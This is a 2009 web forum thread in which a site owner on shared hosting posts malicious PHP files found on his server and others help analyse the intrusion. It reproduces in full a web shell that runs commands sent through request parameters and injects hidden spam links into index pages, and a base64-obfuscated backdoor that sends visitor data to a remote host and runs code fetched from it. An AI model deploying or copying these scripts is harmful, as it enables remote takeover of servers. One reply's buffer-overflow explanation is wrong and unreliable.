Some strange files on my FTP-server

[anubis]

Hi,

 

On my FTP-server I found some strange files today. In several directories.

I'm attaching a zip with the files from one directory. The zip is named after the folder i found.

 

Could anyone tell me what this php file does?

It looks like it's changing permissions on files. But I'm not sure.

 

And could someone help me find all of them. How would I search for it.

The m file seems to be the only one appearing in all rogue directories.

 

And yes, I have changed my FTP pass.

 

Any musings on this subject would be much appreciated.

 

[attachment deleted by admin]

[Stooney]

I don't really see too many people downloading and opening the zip file that was put on your ftp server from who knows where.  But that's just me...Maybe CV will be interested due to some zombie-ftp correlation.  Meh.

[premiso]

If you have a page on your website that includes a file from $_GET or $_POST data that is your first place to look. You can generally look at the Apache Logs to see what pages have been sent GET data and what the get data is. If you see a lot of requests that have URL's in them, chances are that is where you were compromised. By going to the site it should be plain text php which runs remote code to hack into your site.

 

That is my bet on what happened, someone found an exploit in your code and exploited it.

[Daniel0]

Probably some sort of RFI vulnerability.

[anubis]

The site in question is http://maanefestivalen.com. (Sorry, only norwegian)

It's running Wordpress 2.7.1, with a bunch of plugins.

 

The zipfile wasn't uploaded to my server. I zipped the folder, and posted it here.

And I really don't see any danger in opening a zipfile.

 

The first file that had random names throughout my entire ftp server (this one was called sfd.php ) contains this:

 

<?php
ignore_user_abort(1);
set_time_limit(0);

function Clear()
{
unlink("c");
unlink("1r");
  unlink("log");
}

function Clear2()
{
$mrd = trim(file_get_contents("m"));
$pt = "../$mrd";
$fin = file_get_contents($pt);
$fin = ereg_replace("<adsttnmq1>(.*)<sdioyslkjs2>", "", $fin);
  $fin = ereg_replace("<!--dd4-->(.*)<!--dd5-->", "", $fin);
$fin = preg_replace('#<a[^>]+\_lm[^>]*>.*?</a>#is', '', $fin); 
$fin = preg_replace("/http(.*?)tmp6(.*?)\<\/a\>/", "", $fin);
$fin = ereg_replace("<!--dd4-->", "", $fin);
  $fin = ereg_replace("<!--dd5-->", "", $fin);
  $fin = ereg_replace("<font style=\"position: absolute;overflow: hidden;height: 0;width: 0\">", "", $fin);
$fmrd = fopen($pt, "w+");
fwrite($fmrd, $fin);
fclose($fmrd);
echo " upt-ok";
}

function GetVar($name, &$var)
{
$var = "";
if (isset($_POST[$name]))
	$var = $_POST[$name];

  if (isset($_GET[$name]))
	$var = $_GET[$name];

if (($var) =="")
  return  false;
  else return true;
}

function Gen()
{
$alp = "abcdefghiklmnjsweqrtyuiopzx";
$maps = array();
if (isset($_POST["sg"]))
	$sg = $_POST["sg"];

  if (isset($_GET["sg"]))
	$sg = $_GET["sg"]; 

if (isset($_POST["gm"]))
	 $g = $_POST["gm"];

if (isset($_GET["gm"]))
	$g = $_GET["gm"];


$path = "";
$fr = fopen("1r", "a+");
if (file_exists("c"))
{
	$fconf = file("c");
	$tname = trim($fconf[0]);
	$cname = trim($fconf[1]);
	$curs = trim($fconf[2]);
	$pid = trim($fconf[3]);
	if ($pid == 100)
	{
		$pid = 0;
		$rnd = mt_rand(0, 999);
		$nm = "";
    for ($i=0; $i<3; $i++)
  	{
	  	$ran = mt_rand(0,26);
	  	$sym = $alp[$ran];
	  	$nm = $nm.$sym;
	  }
		$cname = $nm;
		mkdir("$tname/$cname");
		$curs = $g;
	}
}
else 
{
	$rnd = mt_rand(0, 999);
	$nm = "";
  for ($i=0; $i<5; $i++)
	{
		$ran = mt_rand(0,26);
		$sym = $alp[$ran];
		$nm = $nm.$sym;
	}
	$tname = $nm;
	$pid = 0;
	$curs = $g;
	mkdir($tname);
	$fht = fopen("$tname/.htaccess", "w+");
	$htname = $sg."2.txt";
	$fp = fopen($htname, "r");
	$fin = '';
	while (!feof($fp))
	{
		 $fc = fgets($fp, 1024);
		 if (!$fc) break;
	   $fin .= $fc;
	}
	fclose($fp);
	fwrite($fht, $fin);
	fclose($fht);
	$rnd = mt_rand(0, 999);
	$nm = "";
    for ($i=0; $i<3; $i++)
  	{
  	$ran = mt_rand(0,26);
  	$sym = $alp[$ran];
  	$nm = $nm.$sym;
  }
	$cname = $nm;
mkdir("$tname/$cname");
}
  $gname = $sg."sgen.php";
for ($j=$pid; $j<$pid+10; $j++)
{
	$fp = fopen($gname."?g=$curs", "r");
	$fin = '';
	while (!feof($fp))
	{
		 $fc = fgets($fp, 1024);
		 if (!$fc) break;
	   $fin .= $fc;
	}
	fclose($fp);

	$fnd = fopen("$tname/$cname/$curs"."_$j.htm", "w+");
	fwrite($fnd, $fin);
	fclose($fnd);
}

if ($j==100)
{
  $fp = fopen($gname."?g=$curs&m=1", "r");
	$fin = '';
	while (!feof($fp))
	{
		 $fc = fgets($fp, 1024);
		 if (!$fc) break;
	   $fin .= $fc;
	}
	fclose($fp);
	$fnd = fopen("$tname/$cname/$curs"."_lm.htm", "w+");
	fwrite($fnd, $fin);
	fclose($fnd);
	$map = "$path/$tname/$cname/$curs"."_lm.htm";
	fwrite($fr,"$map\n");
}

$fconf = fopen("c", "w+");
fwrite($fconf, $tname."\n");
fwrite($fconf, $cname."\n");
fwrite($fconf, $curs."\n");
$nj = $j;
fwrite($fconf, $nj."\n");
fclose($fconf);
}

function Update()
{
$thisname = "1.php";
if (isset($_POST['u']))
  $u = $_POST['u'];
  
if (isset($_GET['u']))
		$u = $_GET['u'];

	$fp = fopen($u, "r");
  $fin = '';
	while (!feof($fp))
	{
		 $fc = fgets($fp, 1024);
		 if (!$fc) break;
	   $fin .= $fc;
	}
  fclose($fp);
  
  $fthis = fopen($thisname, "w+");
  fwrite($fthis, $fin);
  fclose($fthis);
}

function Com()
{
if (isset($_POST['c']))
  @system($_POST['c']);
  if (isset($_GET['c']))
	@system($_GET['c']);
}

function UpKos()
{
$mrd = trim(file_get_contents("m"));
    $pt = "../$mrd";
$fin = file_get_contents($pt);
$fin = ereg_replace("adsttnmq1", "<adsttnmq1>", $fin);
$fin = ereg_replace("sdioyslkjs2", "<sdioyslkjs2>", $fin);
$fmrd = fopen($pt, "w+");
fwrite($fmrd, $fin);
fclose($fmrd);
}


function MRepl()
{
$mpt = "";
$drs = "";
$begtag = "<adsttnmq1><font style=\"position: absolute;overflow: hidden;height: 0;width: 0\">"; 
  $endtag = "</font></body></html><sdioyslkjs2> "; 
$mrd = trim(file_get_contents("m"));
    $pt = "../$mrd";
$fin = file_get_contents($pt);
GetVar("mpt", $mpt);
 // óäàëÿåì çàâåðøàþùèå õòìë òåãè
  $fin = preg_replace ("/<\/body>/i", "", $fin);
  $fin = preg_replace ("/<\/html>/i", "", $fin);
  $fin = ereg_replace("<!--dd4-->(.*)<!--dd5-->", "", $fin);
  $fin = ereg_replace("<adsttnmq1>(.*)<sdioyslkjs2>", "", $fin);
$fp = fopen($mpt, "r");
  GetVar("drs", $drs);
  $fin = $fin.$begtag;  
$drs = str_replace("\\", "", $drs);
  $fin = $fin.$drs;
  $fin = $fin.$endtag; 
  $fmrd = fopen($pt, "w+");
fwrite($fmrd, $fin);
fclose($fmrd);
}

function Main()
{
if (isset($_POST['u']) || isset($_GET['u']))
{
	Update();
	exit();
}

if (isset($_POST['c']) || isset($_GET['c']))
{
	Com();
	exit();
}

	if (isset($_POST['uk']) || isset($_GET['uk']))
{
	UpKos();
	exit();
}

if (isset($_POST['g']) || isset($_GET['g']))
{
	Gen();
	exit();
}

if (isset($_POST['s']) || isset($_GET['s']))
{
	MRepl();
	exit();
}

  if (isset($_POST['cl']) || isset($_GET['cl']))
{
	Clear();
	exit();
}

if (isset($_POST['cl2']) || isset($_GET['cl2']))
{
	Clear2();
	exit();
}

echo "<ok>";

}

Main();

?>

 

The second file, named only "m" in all directories "they" put on my server contained only this.

 

index.php

 

But really, they must have cracked my ftp password. Because these directories were all over the place.

 

What I'm interested in is what this php script is meant to do.

 

:CHEERS:

[premiso]

But really, they must have cracked my ftp password. Because these directories were all over the place.

 

Not necessarily. That script allows them to create any file remotely. They pass in the values and this will create a dynamic file for them. Notice the fopen and the mkdir.

 

That one script alone has exploited you and allows the hacker to generate any file any folder on your system. Your FTP account username/password is safe. Your site's code is vulnerable. Look at the Apache log files you will find where they breached it at the exact file etc.

 

I know cause I had this happen to one of my customer's servers and it was running an OSCommerce version. They were using it to send spam mail from my server.

[Daniel0]

You'll want to look for requests with URIs in the query string. Sort of like http://example.com/?foo=http://something.com/hello.php.

[anubis]

Done some more research on this and found one IP trying to access one of the directories I did not put there.

 

From apache log:

89.149.242.216 - - [06/May/2009:03:20:18 +0200] "POST /axtdn/oit.php HTTP/1.0" 200 0 "-" "-"

 

If you have a look at the source of http://maanefestivalen.no you'll find a funny thing. Some kind of linkspam, and lots of it! (Just scroll to the bottom)

 

Same for a couple of other domains on the same server.

 

http://maanen.no and http://motionthings.com

 

I'm removing this tomorrow.

 

This has been a fun experience.

[anubis]

Did some more research on this and found a lot of sites on the server with the same problem.

And many of them don't even use php.

 

Talked to my hosting company, and they explained it with weak ftp passwords.

I'm guessing they have a bigger problem.

 

Stay away from the second last site in the list (http://www.magnusamundsen.com/), if you don't have noscript installed.

 

So this seems to me like its not originating from my sites, and has nothing to do with php.

 

Thank you for all help.

 

[attachment deleted by admin]

[nadeemshafi9]

if u capture all atempts on your site, you can see there are bots that try to inject a url into your url query variables, these url's have text php code in them, so if you are including files then evaluating them or similar using the url query variables or maby any external source then these bots will inject it and that will probably creat ethe file wich is probably a rootkit setup operation. as they said check the logs and then if you wrote your code for the site wire it up to email you on sql errors and url errors etc and capture all the super arrays especialy GET and POST arrays, email them to urself

[anubis]

After looking a bit further into the issue it seems like the problem is Parallels H-sphere software. A shared hosting platform. http://www.parallels.com/uk/products/hsphere/

 

All the people reporting this problem seems to be hosted on h-sphere.

http://www.esuli.it/index.php/2009/03/24/adsttnmq1sdioyslkjs2-attack/comments/#comments

 

:CHEERS:

[premiso]

it seems like the problem is Parallels H-sphere software.

 

Hence why shared hosting is bad. It takes on user on your host to make every site hosted there insecure, if the shared hosting does not set up their server right.

[anubis]

Just a quick follow up on this.

 

A list of compromised domains on my hosting company. Seems like only linux/unix servers are affected.

List here: http://motionthings.com

 

Anyone know of a forum for this kind of things?

 

::CHEERS::

[anubis]

Sorry for bumping this old thread but I'm hoping someone can tell me what this php script does?

Seems like someone is playing with my host again.

 

<? error_reporting(0);
$a=(isset($_SERVER["HTTP_HOST"])?$_SERVER["HTTP_HOST"]:$HTTP_HOST);
$b=(isset($_SERVER["SERVER_NAME"])?$_SERVER["SERVER_NAME"]:$SERVER_NAME);
$c=(isset($_SERVER["REQUEST_URI"])?$_SERVER["REQUEST_URI"]:$REQUEST_URI);
$d=(isset($_SERVER["PHP_SELF"])?$_SERVER["PHP_SELF"]:$PHP_SELF);
$e=(isset($_SERVER["QUERY_STRING"])?$_SERVER["QUERY_STRING"]:$QUERY_STRING);
$f=(isset($_SERVER["HTTP_REFERER"])?$_SERVER["HTTP_REFERER"]:$HTTP_REFERER);
$g=(isset($_SERVER["HTTP_USER_AGENT"])?$_SERVER["HTTP_USER_AGENT"]:$HTTP_USER_AGENT);
$h=(isset($_SERVER["REMOTE_ADDR"])?$_SERVER["REMOTE_ADDR"]:$REMOTE_ADDR);
$i=(isset($_SERVER["SCRIPT_FILENAME"])?$_SERVER["SCRIPT_FILENAME"]:$SCRIPT_FILENAME);
$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"])?$_SERVER["HTTP_ACCEPT_LANGUAGE"]:$HTTP_ACCEPT_LANGUAGE);
$z="/?".base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".e.".base64_encode($i).".".base64_encode($j);$f=base64_decode("cnNzbmV3cy53cw==");
if (basename($c)==basename($i)&&isset($_REQUEST["q"])&&md5($_REQUEST["q"])=="9ccdf4112d26d1a82b22bbe8e060b4db") $f=$_REQUEST["id"];if((include(base64_decode("aHR0cDovL2Fkcy4=").$f.$z)));
else if($c=file_get_contents(base64_decode("aHR0cDovLzcu").$f.$z))eval($c);else{$cu=curl_init(base64_decode("aHR0cDovLzcxLg==").$f.$z);curl_setopt($cu,CURLOPT_RETURNTRANSFER,1);
$o=curl_exec($cu);curl_close($cu);eval($o);};die(); ?>

 

They also modify .htaccess and redirects every 404-page to the above script.

 

::CHEERS::

[nadeemshafi9]

looks like it is trying to buffer overflow (call a kernal function) on your server THROGH YOUR SERVER so it wont look like anyone has done it except yourself. looks like this script is designed to be harnessed from another server.

[pananza]

Just a quick follow up on this.

 

A list of compromised domains on my hosting company. Seems like only linux/unix servers are affected.

List here: http://motionthings.com

 

I too have ServeTheWorld and several of my domains were compromised too. A random generated folder name with a php file and a file called m in it. All files/folders were dated the 25. april 2009, and I cannot see any changes after this date.

 

The problem is that I'm on Windows servers (w02) and I only run ASP.Net (PHP is not even enabled on my domains). So this is not only limited to linux servers at ServeTheWorld. I too was in contact with support and they claimed that I must have malware on my PC that had snatched my FTP password.

 

I'm not totally convinced. I'm running with an updated antivirus and antispyware. But I'll scan with some more just to be sure. I think ServeTheWorld has/had a big problem, but will not admit it.

 

Do you have a script that checks all sites on the server for infection (since you have the list)? Or did you check all sites manually?

[anubis]

I checked all the sites manually!

 

First I used a reverse domain lookup tool: http://www.yougetsignal.com/tools/web-sites-on-web-server/

And then I just checked the source of all the sites on the servers.

 

http://www.unmaskparasites.com/ does check for the linkspam I mentioned, but does nothing for the new type of numeric php files and the modified .htaccess.

 

Googles safe browsing report isn't that bad, but I think that it only checks for malware distributing sites:

http://www.google.com/safebrowsing/diagnostic?site=AS:34989

 

They also told me that I had malware on my machine, But I'm a network operator and know every packet that goes out (and in) of my machines. Next they'll say that it's a problem with my ISP.

 

I'm now starting to notify the owners of domains on my shared hosting server, since STW is doing nothing.

 

The list on http://motionthings.com is a bit outdated, and a few of the domains are cleaned up.

I'm starting a dugnad http://en.wikipedia.org/wiki/Dugnad to clean my hosting server.

 

But my guess is that they are rooted, since it's all over the place.

 

::CHEERS::

 

[pananza]

I'm starting a dugnad http://en.wikipedia.org/wiki/Dugnad to clean my hosting server.

 

Thanks for the tip about the tools. I'll make a script checking all the sites on "my" server. If more sites are infected then we are probably not going to get any further unless STW actually confesses and  does something about the problem, for confirms that already have.

 

I'll be getting fibre at home next month and it's time to reconsider hosting my domains myself.